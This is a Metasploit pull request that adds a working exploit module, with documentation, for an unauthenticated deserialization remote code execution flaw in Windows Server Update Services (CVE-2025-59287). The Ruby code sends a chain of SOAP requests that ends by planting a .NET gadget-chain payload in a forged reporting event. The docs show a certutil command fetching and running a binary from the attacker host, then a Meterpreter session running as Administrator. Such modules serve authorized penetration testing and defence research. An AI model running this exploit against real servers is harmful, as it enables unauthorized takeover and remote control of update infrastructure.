Skip to content

Adds module for unauthenticated deserialization in WSUS (CVE-2025-59287) #20674

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Merged
dledda-r7 merged 14 commits into from
Nov 12, 2025
Merged

Adds module for unauthenticated deserialization in WSUS (CVE-2025-59287) #20674

Show file tree
Hide file tree
Changes from 10 commits
Commits
Show all changes
14 commits
Select commit Hold shift + click to select a range
103e3d5
Module init
msutovsky-r7 Oct 21, 2025
96edf7b
Updates
msutovsky-r7 Nov 3, 2025
e885da1
Add rce for wsus
msutovsky-r7 Nov 3, 2025
98467f3
Adds msf payload to module, adds docs
msutovsky-r7 Nov 4, 2025
f195ebd
Code refactor
msutovsky-r7 Nov 4, 2025
5ad76f8
Adds more docs, adds description
msutovsky-r7 Nov 4, 2025
f586fff
Adds clear message if exploit fails
msutovsky-r7 Nov 6, 2025
cb00116
Adds SCREEN_EFFECTS to SideEffects
msutovsky-r7 Nov 6, 2025
904e752
Code refactor
msutovsky-r7 Nov 6, 2025
b0afe5e
Randomizes parameters that can be randomized
msutovsky-r7 Nov 6, 2025
570c7c0
Changes CheckCode to Detected
msutovsky-r7 Nov 6, 2025
5ea47e5
Adds formatting to XML data, adds automatic plugin ID extraction
msutovsky-r7 Nov 6, 2025
fc43441
Randomizes XML paramater
msutovsky-r7 Nov 10, 2025
6aeb81a
Adds MITRE reference, updates docs
msutovsky-r7 Nov 10, 2025
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
54 changes: 54 additions & 0 deletions documentation/modules/exploit/windows/http/wsus_deserialization_rce.md
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,54 @@
## Vulnerable Application

Provides features for managing and distributing updates through a management console.
The [CVE-2025-59287](https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2025-59287) is a remote code execution vulnerability in
this component that allows an unauthenticated attacker to create a specially crafted event that gets unsafely deserialized upon server sync.
One way to run synchronization is to open the `Windows Server Update Service` app,
the other is to run the following command from PowerShell:

`(Get-WsusServer).GetSubscription().GetLastSynchronizationInfo()`

## Verification Steps

1. Setup WSUS on target server
1. Do: `use exploit/windows/http/wsus_deserialization_rce`
1. Do: `set RHOSTS [target IP]`
1. Do: `set LHOST [attacker IP]`
1. Do: `set LPORT [attacker port]`
1. Do: `run`

## Options


## Scenarios

```
msf exploit(windows/http/wsus_deserialization_rce) > run verbose=true
[*] Command to run on remote host: certutil -urlcache -f http://192.168.3.7:8080/g7dX6dKZEs4KZYEuEJH2KQ %TEMP%\nYFKgDXL.exe & start /B %TEMP%\nYFKgDXL.exe
[*] Fetch handler listening on 192.168.3.7:8080
[*] HTTP server started
[*] Adding resource /g7dX6dKZEs4KZYEuEJH2KQ
[*] Started reverse TCP handler on 192.168.3.7:4444
[*] Getting server ID
[*] Getting authentication cookie
[*] Getting reporting cookie
[*] Trying to create malicious event
[*] Created malicious event, now waiting for WSUS to sync
[*] Client 10.5.132.161 requested /g7dX6dKZEs4KZYEuEJH2KQ
[*] Sending payload to 10.5.132.161 (Microsoft-CryptoAPI/10.0)
[*] Client 10.5.132.161 requested /g7dX6dKZEs4KZYEuEJH2KQ
[*] Sending payload to 10.5.132.161 (CertUtil URL Agent)
[*] Sending stage (230982 bytes) to 10.5.132.161
[*] Meterpreter session 1 opened (192.168.3.7:4444 -> 10.5.132.161:49984) at 2025-11-04 12:27:00 +0100

meterpreter > sysinfo
Computer : WIN2022__63DA
OS : Windows Server 2022 (10.0 Build 20348).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x64/windows
meterpreter > getuid
Server username: WIN2022__63DA\Administrator
```
211 changes: 211 additions & 0 deletions modules/exploits/windows/http/wsus_deserialization_rce.rb
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,211 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking

include Exploit::Remote::HttpClient
include Msf::Util::DotNetDeserialization

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Windows Server Update Service Deserialization Remote Code Execution',
'Description' => %q{
This module exploits deserialization vulnerability in legacy serialization mechanism in Windows Server Update Services (WSUS). The vulnerability allows unauthenticated attacker to create specially crafted event, which triggers unsafe deserialization upon server synchronization. The module does not require any other options and upon successful exploitation, the payload is executed in context of administrator.
},
'License' => MSF_LICENSE,
'Author' => [
'mwulftange', # security research
'msutovsky-r7' # module development
],
'References' => [
[ 'URL', 'https://code-white.com/blog/wsus-cve-2025-59287-analysis/'],
[ 'CVE', '2025-59287']
],
'Arch' => ARCH_CMD,
'Platform' => 'win',
'DefaultOptions' => {
'RPORT' => '8530',
'WfsDelay' => 900 # need to wait for WSUS to try synchronize
Copy link
Contributor

@jvoisin jvoisin Nov 8, 2025

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Why 900 seconds specifically?

Copy link
Contributor Author

@msutovsky-r7 msutovsky-r7 Nov 10, 2025

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

No specific reason, wait here can be longer depending on the server - 900 is for debugging purpose.

},
'Targets' => [
[ 'Windows', {}]
],

'DisclosureDate' => '2025-10-14',
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [CRASH_SERVICE_RESTARTS],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, SCREEN_EFFECTS]
}
)
)
end

def get_soap_response_xml(path, soap_action, data)
res = send_request_cgi({
'uri' => path,
'method' => 'POST',
'headers' => {
'SOAPAction' => soap_action
},
'ctype' => 'text/xml',
'data' => data
})

fail_with(Failure::UnexpectedReply, 'Received unexpected response from WSUS') unless res&.code == 200
xml = res.get_xml_document
xml.remove_namespaces!
xml
end

def get_server_id
soap_body = %(<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<GetRollupConfiguration xmlns="http://www.microsoft.com/SoftwareDistribution">
<cookie xmlns:i="http://www.w3.org/2001/XMLSchema-instance" i:nil="true"/>
</GetRollupConfiguration>
</soap:Body>
</soap:Envelope>)

xml = get_soap_response_xml(normalize_uri('ReportingWebService', 'ReportingWebService.asmx'), 'http://www.microsoft.com/SoftwareDistribution/GetRollupConfiguration', soap_body)

@server_id = xml.xpath('//ServerId').text.to_s

fail_with(Failure::Unknown, 'Failed to get server ID') unless @server_id
end

def get_auth_cookie
soap_body = %(<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<GetAuthorizationCookie xmlns="http://www.microsoft.com/SoftwareDistribution/Server/SimpleAuthWebService">
<clientId>#{@server_id}</clientId>
<targetGroupName></targetGroupName>
<dnsName>#{Rex::Text.rand_text_alpha_lower(4..8)}</dnsName>
</GetAuthorizationCookie>
</soap:Body>
</soap:Envelope>)

xml = get_soap_response_xml(normalize_uri('SimpleAuthWebService', 'SimpleAuth.asmx'), 'http://www.microsoft.com/SoftwareDistribution/Server/SimpleAuthWebService/GetAuthorizationCookie', soap_body)

@auth_cookie = xml.xpath('//CookieData').text.to_s

fail_with(Failure::Unknown, 'Failed to get authentication cookie') unless @auth_cookie
end

def get_reporting_parameters
timenow = Time.now.strftime('%Y-%m-%dT%H:%M:%SZ')

soap_body = %(<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<GetCookie xmlns="http://www.microsoft.com/SoftwareDistribution/Server/ClientWebService">
<authCookies>
<AuthorizationCookie>
<PlugInId>#{Rex::Text.rand_text_alpha_lower(8..12)}</PlugInId>
<CookieData>#{@auth_cookie}</CookieData>
</AuthorizationCookie>
</authCookies>
<oldCookie xmlns:i="http://www.w3.org/2001/XMLSchema-instance" i:nil="true"/>
<lastChange>#{timenow}</lastChange>
<currentTime>#{timenow}</currentTime>
<protocolVersion>1.20</protocolVersion>
</GetCookie>
</soap:Body>
</soap:Envelope>)

xml = get_soap_response_xml(normalize_uri('ClientWebService', 'Client.asmx'), 'http://www.microsoft.com/SoftwareDistribution/Server/ClientWebService/GetCookie', soap_body)

@encrypted_data = xml.xpath('//EncryptedData').text.to_s
@expiration = xml.xpath('//Expiration').text.to_s

fail_with(Failure::Unknown, 'Failed to get reporting parameters') unless @encrypted_data && @expiration
end

def create_malicious_event
timenow = Time.now.strftime('%Y-%m-%dT%H:%M:%SZ')
payload_data = ::Msf::Util::DotNetDeserialization.generate(
payload.encoded,
gadget_chain: :WindowsIdentity,
formatter: :SoapFormatter
)

soap_body = %(<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">
<soap:Body>
<ReportEventBatch xmlns="http://www.microsoft.com/SoftwareDistribution">
<cookie>
<Expiration>#{@expiration}</Expiration>
<EncryptedData>#{@encrypted_data}</EncryptedData>
</cookie>
<clientTime>#{timenow}</clientTime>
<eventBatch xmlns:q1="http://www.microsoft.com/SoftwareDistribution" soapenc:arrayType="q1:ReportingEvent[1]">
<ReportingEvent>
<BasicData>
<TargetID>
<Sid>#{SecureRandom.uuid.strip}</Sid>
</TargetID>
<SequenceNumber>0</SequenceNumber>
<TimeAtTarget>#{timenow}</TimeAtTarget>
<EventInstanceID>#{SecureRandom.uuid.strip}</EventInstanceID>
<NamespaceID>2</NamespaceID>
<EventID>389</EventID>
<SourceID>301</SourceID>
<UpdateID>
<UpdateID>00000000-0000-0000-0000-000000000000</UpdateID>
<RevisionNumber>0</RevisionNumber>
</UpdateID>
<Win32HResult>0</Win32HResult>
<AppName>#{Rex::Text.rand_text_alpha_lower(4..8)}</AppName>
</BasicData>
<ExtendedData>
<MiscData soapenc:arrayType="xsd:string[2]">
<string>Administrator=SYSTEM</string>
<string>SynchronizationUpdateErrorsKey=#{Rex::Text.html_encode(payload_data)}</string>
</MiscData>
</ExtendedData>
<PrivateData>
<ComputerDnsName></ComputerDnsName>
<UserAccountName></UserAccountName>
</PrivateData>
</ReportingEvent>
</eventBatch>
</ReportEventBatch>
</soap:Body>
</soap:Envelope>)

xml = get_soap_response_xml(normalize_uri('ReportingWebService', 'ReportingWebService.asmx'), 'http://www.microsoft.com/SoftwareDistribution/ReportEventBatch', soap_body)

fail_with(Failure::PayloadFailed, 'Failed to create malicious report, target might be not vulnerable') unless xml.xpath('//ReportEventBatchResult').text.to_s == 'true'
end

##
# Could not find better way to check if target is running vulnerable WSUS, leaving it for now with checking for presence of WSUS
##
def check
res = send_request_cgi({
'method' => 'GET'
})
return CheckCode::Safe('Target does not run WSUS') unless res&.code == 200 && res.headers['Server'] == 'Microsoft-IIS/10.0'

CheckCode::Appears('Target is probably running WSUS')
end

def exploit
vprint_status('Getting server ID')
get_server_id
vprint_status('Getting authentication cookie')
get_auth_cookie
vprint_status('Getting reporting cookie')
get_reporting_parameters
vprint_status('Trying to create malicious event')
create_malicious_event
vprint_status('Created malicious event, now waiting for WSUS to sync')
end
end